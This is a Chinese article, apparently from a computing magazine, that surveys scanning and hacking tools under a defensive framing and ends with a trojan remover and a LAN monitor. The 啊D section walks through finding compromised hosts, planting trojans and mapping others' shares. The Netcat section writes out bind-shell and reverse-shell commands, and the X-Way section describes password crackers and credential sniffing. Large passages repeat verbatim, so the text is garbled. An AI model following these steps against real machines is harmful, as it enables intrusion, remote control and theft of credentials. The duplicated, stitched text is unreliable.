让漏洞无处藏身
经常看到这样的帖子:“我中木马了,怎么办?”、“我被攻击了”,“我的Windows有问题,是不是被入侵啦?”等等。为什么我们的电脑会被攻击,甚至被植入木马呢?这是因为我们连入网络的电脑通常存在许多漏洞,会被黑客们广为利用。这些系统漏洞的存在有很多原因,如操作系统的问题、应用程序的问题、使用者设置的问题等。更为可怕的是,每个系统都有漏洞,不论在系统安全性上投入多少财力,攻击者都可以发现一些可利用的特征和配置缺陷。
好在,发现一个已知漏洞远比发现一个未知漏洞容易得多,所以,多数攻击者都会想尽各种办法寻找被攻击对象存在的漏洞,比如利用漏洞扫描工具,而后再发起攻击。
然而,漏洞扫描工具是一柄双刃剑,黑客可以利用它入侵系统,我们也可以通过它有效地防范黑客入侵。我们可以对自己的电脑进行漏洞扫描(也叫安全扫描),在黑客利用这些常见漏洞之前把它挖出来,有些漏洞扫描工具甚至可以远程评估网络的安全级别,并生成评估报告,提供相应的整改措施,黑客将很难找到可乘之机。
要想快速、简便地发现这些漏洞,寻找一款合适的漏洞扫描工具无疑是非常必要的。下面,笔者将为您介绍6款精品工具。
好在,发现一个已知漏洞远比发现一个未知漏洞容易得多,所以,多数攻击者都会想尽各种办法寻找被攻击对象存在的漏洞,比如利用漏洞扫描工具,而后再发起攻击。
然而,漏洞扫描工具是一柄双刃剑,黑客可以利用它入侵系统,我们也可以通过它有效地防范黑客入侵。我们可以对自己的电脑进行漏洞扫描(也叫安全扫描),在黑客利用这些常见漏洞之前把它挖出来,有些漏洞扫描工具甚至可以远程评估网络的安全级别,并生成评估报告,提供相应的整改措施,黑客将很难找到可乘之机。
要想快速、简便地发现这些漏洞,寻找一款合适的漏洞扫描工具无疑是非常必要的。下面,笔者将为您介绍6款精品工具。
□ 啊D网络工具包
“啊D网络工具包”虽然是一款测试版软件,但其功能非常强大,使用起来也非常简单。所以,无论是对黑客还是网管员,它都是一款不可多得的工具。
肉鸡查找。只需点击工具格上的“肉鸡查找”标签,在弹出的窗口中的“IP”栏输入要搜索的IP地址,在“到”栏会自动填入一个网段的结束IP,点击“开始”扫描,很快就会弹出一个窗口,显示出搜索到的几个“肉鸡”,其用户名、所使用的操作系统一目了然。
种植木马。选择一台采用Windows 2000的机器,点击“种植木马”按钮进入相关窗口,再点击“本地文件”右侧的按钮调入事先做好的木马,然后点击“开始”按钮,稍等一会就会返回成功与否的信息。如果成功了,对方就成为你的肉鸡了;如果不成功,还可以更换该电脑的另一个用户试试。
访问共享资源。点击“共享查找”标签,输入搜索IP的范围,点击“开始查找”按钮就开始搜索了,不一会,就能看到有共享目录电脑的IP地址了,双击IP前的“+”将其共享目录打开,然后点击一个目录,再点击右侧的“映射”按钮,运行气好的话,映射就会成功了。
搜索MAC。想知道一个网段中当前正有多少台电脑开着吗?使用“网卡MAC”功能就能得到。设置好起止IP后,点击“读取”按钮,很快就会得到当前网段中正在线电脑的IP地址、用户名、工作组、网卡MAC了。这为我们有目的地进行“网鸡扫描”和“共享查找”提供了依据。
看了上面的入侵过程,你是否觉得很没安全感呢?说不定有人已经入侵了你的电脑呢。我们该如何查看?又该如何防范呢?
查看网络状态。使用“网络状态”功能就能知道自己机子打开了什么端口。点击工具栏上的“网络状态”按钮,便可以查看到详细的端口开放情况和与本机连接的IP地址、端口号。如果对端口的作用还不太了解,也可以点击“常用端口列表”按钮,这里对所有端口(从1到65000)的作用均有描述。
查看系统进程。使用“进程查看”功能查看自己电脑中正在运行的软件,对于查木马也有一定的帮助。如果看到不正常的进程要尽快按“删除”按钮删除掉,并根据提示的文件路径,将硬盘上相应的文件和目录也删除掉,以绝后患!
停止服务。在DOS下输入“net stop server”,停止Server服务,关了该服务后,远程的电脑就不能查看你的共享和用IPC$入侵了,电脑的安全性自然大大提高。
实际上,“啊D网络工具包”还有很多的功能,如IP端口扫描(有针对性的查看整个网段的某个端口,如冰河端口7626)、主机查询(查IP所在地,也可以查某地方的IP)、Ping(判断某IP是否和网络连接)、域名<=>IP转换、路由查看等。
肉鸡查找。只需点击工具格上的“肉鸡查找”标签,在弹出的窗口中的“IP”栏输入要搜索的IP地址,在“到”栏会自动填入一个网段的结束IP,点击“开始”扫描,很快就会弹出一个窗口,显示出搜索到的几个“肉鸡”,其用户名、所使用的操作系统一目了然。
种植木马。选择一台采用Windows 2000的机器,点击“种植木马”按钮进入相关窗口,再点击“本地文件”右侧的按钮调入事先做好的木马,然后点击“开始”按钮,稍等一会就会返回成功与否的信息。如果成功了,对方就成为你的肉鸡了;如果不成功,还可以更换该电脑的另一个用户试试。
访问共享资源。点击“共享查找”标签,输入搜索IP的范围,点击“开始查找”按钮就开始搜索了,不一会,就能看到有共享目录电脑的IP地址了,双击IP前的“+”将其共享目录打开,然后点击一个目录,再点击右侧的“映射”按钮,运行气好的话,映射就会成功了。
搜索MAC。想知道一个网段中当前正有多少台电脑开着吗?使用“网卡MAC”功能就能得到。设置好起止IP后,点击“读取”按钮,很快就会得到当前网段中正在线电脑的IP地址、用户名、工作组、网卡MAC了。这为我们有目的地进行“网鸡扫描”和“共享查找”提供了依据。
看了上面的入侵过程,你是否觉得很没安全感呢?说不定有人已经入侵了你的电脑呢。我们该如何查看?又该如何防范呢?
查看网络状态。使用“网络状态”功能就能知道自己机子打开了什么端口。点击工具栏上的“网络状态”按钮,便可以查看到详细的端口开放情况和与本机连接的IP地址、端口号。如果对端口的作用还不太了解,也可以点击“常用端口列表”按钮,这里对所有端口(从1到65000)的作用均有描述。
查看系统进程。使用“进程查看”功能查看自己电脑中正在运行的软件,对于查木马也有一定的帮助。如果看到不正常的进程要尽快按“删除”按钮删除掉,并根据提示的文件路径,将硬盘上相应的文件和目录也删除掉,以绝后患!
停止服务。在DOS下输入“net stop server”,停止Server服务,关了该服务后,远程的电脑就不能查看你的共享和用IPC$入侵了,电脑的安全性自然大大提高。
实际上,“啊D网络工具包”还有很多的功能,如IP端口扫描(有针对性的查看整个网段的某个端口,如冰河端口7626)、主机查询(查IP所在地,也可以查某地方的IP)、Ping(判断某IP是否和网络连接)、域名<=>IP转换、路由查看等。
□ Netcat
Netcat,鼎鼎有名的网络瑞士×××,被誉为黑客界的元老级工具,是一个简单而有用的工具,能透过使用TCP、UDP协议的网络连接去读写数据。
Netcat是笔者想要介绍的6款工具中唯一款在DOS下运行的工具,被设计成一个稳定的后门工具,能够直接由其他程序和脚本轻松驱动,同时也是一个功能强大的网络调试和探测工具,能够根据需要建立几乎所有类型的网络连接,甚至还提供了UNIX版本。
在DOS下,运行:nc.exe -h ,即可看到各参数的使用方法。
连接模式:nc [-options] hostname port[s] [ports]
监听模式:nc -l -p port [options] [hostname] [port]
比如,连接到REMOTE主机,格式为nc -nvv 192.168.x.x 80,连到192.168.x.x的TCP80端口。
监听LOCAL主机,格式为nc -l -p 80 ,监听本机的TCP80端口。
扫描远程主机,格式为nc -nvv -w2 -z 192.168.x.x 80-445,扫描192.168.x.x的TCP80到TCP445的所有端口。
REMOTE主机绑定SHELL,格式为nc -l -p 5354 -t -e C:\winnt\system32\cmd.exe,绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP 5354端口。
REMOTE主机绑定SHELL并反向连接,格式为nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354,绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口。
以上为最基本的几种用法,其实NC的用法还有很多,当配合管道命令“|”与重定向命令“<”、“>”等命令时功能更强大。
其部分参数意义如下:
-d 后台模式
-e prog 程序重定向,一旦连接,就执行[危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
Netcat是笔者想要介绍的6款工具中唯一款在DOS下运行的工具,被设计成一个稳定的后门工具,能够直接由其他程序和脚本轻松驱动,同时也是一个功能强大的网络调试和探测工具,能够根据需要建立几乎所有类型的网络连接,甚至还提供了UNIX版本。
在DOS下,运行:nc.exe -h ,即可看到各参数的使用方法。
连接模式:nc [-options] hostname port[s] [ports]
监听模式:nc -l -p port [options] [hostname] [port]
比如,连接到REMOTE主机,格式为nc -nvv 192.168.x.x 80,连到192.168.x.x的TCP80端口。
监听LOCAL主机,格式为nc -l -p 80 ,监听本机的TCP80端口。
扫描远程主机,格式为nc -nvv -w2 -z 192.168.x.x 80-445,扫描192.168.x.x的TCP80到TCP445的所有端口。
REMOTE主机绑定SHELL,格式为nc -l -p 5354 -t -e C:\winnt\system32\cmd.exe,绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP 5354端口。
REMOTE主机绑定SHELL并反向连接,格式为nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354,绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口。
以上为最基本的几种用法,其实NC的用法还有很多,当配合管道命令“|”与重定向命令“<”、“>”等命令时功能更强大。
其部分参数意义如下:
-d 后台模式
-e prog 程序重定向,一旦连接,就执行[危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
□ N-Stealth HTTP Security Scanner
N-Stealth是一款能力非凡的Web服务器安全扫描工具。它可以测试扫描目前几乎所有Web类型的服务器,包括某些网络设备的Web控制平台,支持大多数Web服务应用程序(如CGI、ColdFusion、ASP、Lotus Domino、FrontPage、PHP等);能进行超过30000种的Web服务器漏洞测试,不过免费版最多只能进行16000种漏洞测试;进行SANS/FBI的头10&20漏洞扫描方式,全面支持HTTP与HTTPS(SSL);带有系统辨别探测功能和避开IDS(入侵测试系统)捕捉的功能;全面支持使用代理服务器;容易解读的图形报告生成模块,报告书外带各种漏洞的解决方案;支持虚拟主机,远程扫描测试时你的机器不再需要安装附加软件;准确的错误筛选机制,带有缓冲区溢出测试引擎,带有E-mail报警功能和漏洞数据库能进行智能升级,此功能仅限于正式版才能使用。
N-Stealth的官方网站是http://www.nstalker.com,最新专业版为V 5.5,但不是很容易下载到,而免费的V 5.2版本则不存在这个问题。不过,从官方网站上下载比较麻烦,需要拥有能够接收外国邮件的信箱(如hotmail.com),从信件中得到下载地址,然后才能下载。为了方便大家下载,也可以去笔者的私人网站http://hjz007.533.net下载。
N-Stealth的官方网站是http://www.nstalker.com,最新专业版为V 5.5,但不是很容易下载到,而免费的V 5.2版本则不存在这个问题。不过,从官方网站上下载比较麻烦,需要拥有能够接收外国邮件的信箱(如hotmail.com),从信件中得到下载地址,然后才能下载。为了方便大家下载,也可以去笔者的私人网站http://hjz007.533.net下载。
□ Superscan
Superscan是黑客们寻找“肉鸡”的得力工具。它的功能非常强大,运行于Windows系统下,是一款非常简单、有效、快速的端口扫描工具。它可以随意选择IP地址和端口,而且端口后面都有简单说明,地址输入也更轻松,在找到的主机上,单击右键可以打开HTTP浏览、Telnet登陆或FTP上传,还有nslookup域名查询等功能,扫描速度很快。
在“开始IP”栏输入开始的IP,如10.178.107.2,在“结束IP”栏输入结束IP地址:10.178.107.254,点击右侧的“->”按钮就会将当前的IP范围添加到右侧的扫描列表中。接下来点击“主机和服务器扫描设置”标签项,勾选“UDP端口扫描”项,然后点击“清除所有”按钮,将默认的扫描端口清除,在“开始端口”栏输入139,在“结束端口”栏输入139,点击“->”按钮将该端口添加到扫描端口列表中,使用同样的方法将其它端口添加上。接着勾选“TCP 端口扫描”项,同样添加上扫描端口。点击“扫描”标签项返回主界面,点击左下角的三角按钮就开始搜索了。只要你的电脑速度快,很快就会有结果,点击“查看HTML结果”按钮还能得到所有有SA空密码漏洞电脑的端口开放情况。
看了上面的内容,相信你已经知道黑客是如何侵入我们的电脑了。那就是先获得我们电脑的IP地址,然后使用Superscan进行扫描,再获得开放的端口和弱口令,而后就可以登录到我们的电脑中了,放不放木马程序那可是他说了算。因此,我们要防范黑客的入侵就要采取隐藏自己的IP地址,关闭某些端口,为每个用户加上密码的方法。
在“开始IP”栏输入开始的IP,如10.178.107.2,在“结束IP”栏输入结束IP地址:10.178.107.254,点击右侧的“->”按钮就会将当前的IP范围添加到右侧的扫描列表中。接下来点击“主机和服务器扫描设置”标签项,勾选“UDP端口扫描”项,然后点击“清除所有”按钮,将默认的扫描端口清除,在“开始端口”栏输入139,在“结束端口”栏输入139,点击“->”按钮将该端口添加到扫描端口列表中,使用同样的方法将其它端口添加上。接着勾选“TCP 端口扫描”项,同样添加上扫描端口。点击“扫描”标签项返回主界面,点击左下角的三角按钮就开始搜索了。只要你的电脑速度快,很快就会有结果,点击“查看HTML结果”按钮还能得到所有有SA空密码漏洞电脑的端口开放情况。
看了上面的内容,相信你已经知道黑客是如何侵入我们的电脑了。那就是先获得我们电脑的IP地址,然后使用Superscan进行扫描,再获得开放的端口和弱口令,而后就可以登录到我们的电脑中了,放不放木马程序那可是他说了算。因此,我们要防范黑客的入侵就要采取隐藏自己的IP地址,关闭某些端口,为每个用户加上密码的方法。
□ X-Scan
X-Scan 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测,支持插件功能,提供了图形界面和命令行两种操作方式。X-Scan扫描的内容包括远程操作系统类型及版本、标准端口状态及端口BANNER信息、CGI漏洞、IIS漏洞、RPC漏洞、SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户、NT服务器NETBIOS信息等。它可以自动执行几十个脚本文件(可上网下载扩充)模拟对系统进行攻击的行为,并记录系统的反应,从而发现其中的漏洞。
下面,笔者以X-Scan图形界面的操作为例,简单介绍一下它的使用过程。
首先点击菜单“设置”→“扫描参数”,在弹出窗口中选择“基本设置”页。在“指定IP范围”中输入独立IP地址或域名,也可以输入以“-”和“,”分隔的IP范围,还可以“从文件中获取主机列表”(文件格式为纯文本,每一行可包含独立IP或域名,也可包含以“-”和“,”分隔的IP范围)。
在“高级设置”标签项中设置“最大并发线程数量”和“最大并发主机数量”,一般使用默认值即可。另外,请勾选“显示详细进度”项,这样将在主界面普通信息栏中显示详细的扫描过程。其他可使用默认设置。
在“端口相关设置”标签项中,可设置“待检测端口”( 输入以“-”和“,”分隔的TCP端口范围)、“检测方式”、“根据响应识别服务”和“主动识别操作系统类型”等项目,建议使用默认设置。
在“网络设置”标签页中,需要配置“网络适配器”, 选择适当的网络适配器以便WinPCap驱动过滤相应的数据包,否则可能会漏报由WinPCap驱动接收数据的NASL脚本检测结果,也会影响采用NMAP的方法识别目标操作系统的结果。
设置完成后,点击“确定”返回主界面,点击工具栏上的“开始扫描”按钮,耐心等待一段时间,就会得到扫描报告了。报告文件会保存在LOG目录下,会详细地列出该计算机存在的安全漏洞,并给出了合理的解决方案。
需要注意的是,该软件扫描速度比较慢,建议不要一次扫描太多主机。
下面,笔者以X-Scan图形界面的操作为例,简单介绍一下它的使用过程。
首先点击菜单“设置”→“扫描参数”,在弹出窗口中选择“基本设置”页。在“指定IP范围”中输入独立IP地址或域名,也可以输入以“-”和“,”分隔的IP范围,还可以“从文件中获取主机列表”(文件格式为纯文本,每一行可包含独立IP或域名,也可包含以“-”和“,”分隔的IP范围)。
在“高级设置”标签项中设置“最大并发线程数量”和“最大并发主机数量”,一般使用默认值即可。另外,请勾选“显示详细进度”项,这样将在主界面普通信息栏中显示详细的扫描过程。其他可使用默认设置。
在“端口相关设置”标签项中,可设置“待检测端口”( 输入以“-”和“,”分隔的TCP端口范围)、“检测方式”、“根据响应识别服务”和“主动识别操作系统类型”等项目,建议使用默认设置。
在“网络设置”标签页中,需要配置“网络适配器”, 选择适当的网络适配器以便WinPCap驱动过滤相应的数据包,否则可能会漏报由WinPCap驱动接收数据的NASL脚本检测结果,也会影响采用NMAP的方法识别目标操作系统的结果。
设置完成后,点击“确定”返回主界面,点击工具栏上的“开始扫描”按钮,耐心等待一段时间,就会得到扫描报告了。报告文件会保存在LOG目录下,会详细地列出该计算机存在的安全漏洞,并给出了合理的解决方案。
需要注意的是,该软件扫描速度比较慢,建议不要一次扫描太多主机。
□ X-Way 高级扫描器
X-Way 是一款具有许多优秀功能多线程的扫描工具,新版本最大的特色是二级代理扫描,使扫描变得更为隐蔽。下面,笔者就介绍一下它的主要功能:
高级扫描功能。可以对系统进行综合扫描,包括端口扫描、系统CGI漏洞扫描(包括搜集的1000多条CGI漏洞,如unicode漏洞)、IIS5 NULL.printer漏洞扫描,还可以对NT主机进行IPC探测,如列举主机用户、共享资源、工作组等,获取Web服务信息)、SMTP的VERY/EXPN用户验证及漏洞检测、FTP匿名登陆检测、Finger探测、RPC探测、弱口令检测等。
主机扫描。可以轻松进行选择性扫描,能够对一个范围的IP地址进行扫描,包括ping方式搜索、端口方式搜索及共享主机、自定义CGI、IIS5 NULL.printer扫描、IIS SHELL扫描、MS-SQL空口令肉鸡、匿名FTP服务器、免费SOCKS5、HTTP代理服务器搜索等,同时也支持代理扫描。
查询器。X-Way有几个小功能的查询器,包括IP位置查询、时间服务器查询、DNS查询、finger查询、NT时间查询等。
猜解机。可以对POP协议、FTP协议、共享资源、MSSQL密码、SOCKS5代理、HTTP页面服务猜解,包括通过字典猜解/自定义字符猜解和广度算法多线程进行穷举猜解等。
嗅探器。可以嗅探局域网内的数据包,如果有人登陆FTP、POP等就会自动嗅探出用户名和密码。
高级扫描功能。可以对系统进行综合扫描,包括端口扫描、系统CGI漏洞扫描(包括搜集的1000多条CGI漏洞,如unicode漏洞)、IIS5 NULL.printer漏洞扫描,还可以对NT主机进行IPC探测,如列举主机用户、共享资源、工作组等,获取Web服务信息)、SMTP的VERY/EXPN用户验证及漏洞检测、FTP匿名登陆检测、Finger探测、RPC探测、弱口令检测等。
主机扫描。可以轻松进行选择性扫描,能够对一个范围的IP地址进行扫描,包括ping方式搜索、端口方式搜索及共享主机、自定义CGI、IIS5 NULL.printer扫描、IIS SHELL扫描、MS-SQL空口令肉鸡、匿名FTP服务器、免费SOCKS5、HTTP代理服务器搜索等,同时也支持代理扫描。
查询器。X-Way有几个小功能的查询器,包括IP位置查询、时间服务器查询、DNS查询、finger查询、NT时间查询等。
猜解机。可以对POP协议、FTP协议、共享资源、MSSQL密码、SOCKS5代理、HTTP页面服务猜解,包括通过字典猜解/自定义字符猜解和广度算法多线程进行穷举猜解等。
嗅探器。可以嗅探局域网内的数据包,如果有人登陆FTP、POP等就会自动嗅探出用户名和密码。
以上介绍的6款扫描工具都经过了时间的考验,是被众多使用者证明非常有效的扫描工具。现在,网络上扫描工具很多,良莠不齐,在选择扫描工具的时候,除了防止扫描工具隐藏有对目标主机的攻击因素以外,还要注意扫描工具本身是否被捆绑了木马。因此,笔者在此特别提醒您注意,切勿随意试用来历不明的扫描工具,以免适得其反。
□ 木马清除大师
木马清除大师BeatTrojan能够通过当前系统的活动进程、注册表项、开放的网络端口来查找并删除系统中运行的各种流行木马,可以查杀冰河之类的文件关联型木马和其他端口连接木马。而且,它还将许多安全审核功能集于一身,可以帮助您迅速判断本机的安全状况。
一些DLL木马通常无法直接运行,必须依靠系统进程才可以运行。这时,BeatTrojian的进程管理功能就可以发挥作用了。打开进程管理窗口,能够清楚地查看系统当前运行着的进程名、进程标识、进程路径、调用模块、线程数等,还可以在此释放调用模块,或关闭一些无法在任务管理器中关闭的进程。如果发现可疑进程,可以用右键单击它,通过“文件属性”命令查看该进程对应的文件的详细信息,这对分析木马是否存在是非常必要的。如果确认中了木马的话,可以执行右键菜单中的“删除文件”命令,将它从系统中删除。
该程序还提供了“进程端口关联”功能,帮助我们明确哪个进程打开了哪个端口。当有陌生的端口被打开时,我们可以及时关闭对应端口的进程,防止被木马利用。而且,“木马清除大师”还支持局域网检测功能,能通过扫描网络端口的方法,检测局域网中其它工作站是否有木马存在,这对网管员来说是非常实用的一项功能。
除了克制木马外,BeatTrojan还是一款很好的网络管理工具。打开该程序的共享管理窗口,能够查看到当前系统中究竟有哪些共享资源。选中某一共享项目,我们可以对它分配访问权限,也可以关闭它的共享状态。
而且,“木马清除大师”也可以对整个局域网进行动态监控,监控的内容包括数据报传输内容、传输协议、传输双方的IP地址等,也可以监控到本地系统的网络连接状态,能断开和远程服务器的连接。该程序还具有IE修复功能,它能轻松修复遭受恶意网页代码攻击的IE浏览器,而无需你用手工方式修复。
唯一遗憾的是,该工具暂时不支持文件扫描,对于隐藏在文件中的木马就无能为力了。希望它的下一个版本会支持该功能。
一些DLL木马通常无法直接运行,必须依靠系统进程才可以运行。这时,BeatTrojian的进程管理功能就可以发挥作用了。打开进程管理窗口,能够清楚地查看系统当前运行着的进程名、进程标识、进程路径、调用模块、线程数等,还可以在此释放调用模块,或关闭一些无法在任务管理器中关闭的进程。如果发现可疑进程,可以用右键单击它,通过“文件属性”命令查看该进程对应的文件的详细信息,这对分析木马是否存在是非常必要的。如果确认中了木马的话,可以执行右键菜单中的“删除文件”命令,将它从系统中删除。
该程序还提供了“进程端口关联”功能,帮助我们明确哪个进程打开了哪个端口。当有陌生的端口被打开时,我们可以及时关闭对应端口的进程,防止被木马利用。而且,“木马清除大师”还支持局域网检测功能,能通过扫描网络端口的方法,检测局域网中其它工作站是否有木马存在,这对网管员来说是非常实用的一项功能。
除了克制木马外,BeatTrojan还是一款很好的网络管理工具。打开该程序的共享管理窗口,能够查看到当前系统中究竟有哪些共享资源。选中某一共享项目,我们可以对它分配访问权限,也可以关闭它的共享状态。
而且,“木马清除大师”也可以对整个局域网进行动态监控,监控的内容包括数据报传输内容、传输协议、传输双方的IP地址等,也可以监控到本地系统的网络连接状态,能断开和远程服务器的连接。该程序还具有IE修复功能,它能轻松修复遭受恶意网页代码攻击的IE浏览器,而无需你用手工方式修复。
唯一遗憾的是,该工具暂时不支持文件扫描,对于隐藏在文件中的木马就无能为力了。希望它的下一个版本会支持该功能。
□ 局域网监控大鳄
软件名称:网路岗4.0
运行平台:Windows 9x/ME/NT/2000/XP
软件授权:共享软件
软件大小:5.64MB
==>点击下载
在单位和企业里,为了提高工作效率和保证资料的安全,通常都会安装局域网监控软件。在这里,笔者要为您推荐一款非常不错的企业员工上网监管软件——网路岗4.0。
网路岗4.0监控内容丰富、全面,且只需安装在一台电脑上即可监控整个网络。它默认的监控模式为“基于网卡MAC”,同时提供了基于帐户、基于IP、混合模式(适用于多VLAN/网段情况)等多种监控模式,让使用者可以根据实际情况更好地进行监控。
透彻的邮件监控功能。该软件除了能监控像Outlook、Foxmail等软件收发的邮件之外,还可以监控到在免费网页上发送的邮件。笔者所了解的一些专业邮件监控软件,绝大多数对邮件的监控都不透彻,其中最大的问题在于这些软件不能分析出邮件的附件,而网路岗在这方面就做得非常好。
全面的协议分析。网路岗4.0能监控的协议包括 HTTP、POP3、SMTP、ICQ、Telnet、FTP、MSN Messenger、Yahoo Mensenger、QQ等。相对于以往版本,它还增加了自定义分析模式,让用户可以自行定义通讯包匹配模式,一旦符合条件,即可进行相关日志记录,并发出警报。
详细的堵截日志。网路岗3.0对网络信息的堵截是隐蔽的,堵截信息没有公开化,而4.0则完全相反。它在现场观察窗口,用户不仅可以监测目标机器的所有上网活动,还可以看到详细的上网“堵截”记录,并查看“堵截”原因,帮助网管员更加全面地了解到网络动向。
完善的跨VLAN支持。网路岗4.0比以往版本增加了好几种监控模式,每一种模式都不需要安装“探测器”就可以实现多VLAN监控。
特别的是,网路岗4.0还可以同时支持多种大型数据库,如SQL、Oracle、SYBASE等,系统会自动将日志内容定期导入到大型数据库,其完全透明的数据结构也便于上网日志的二次开发。
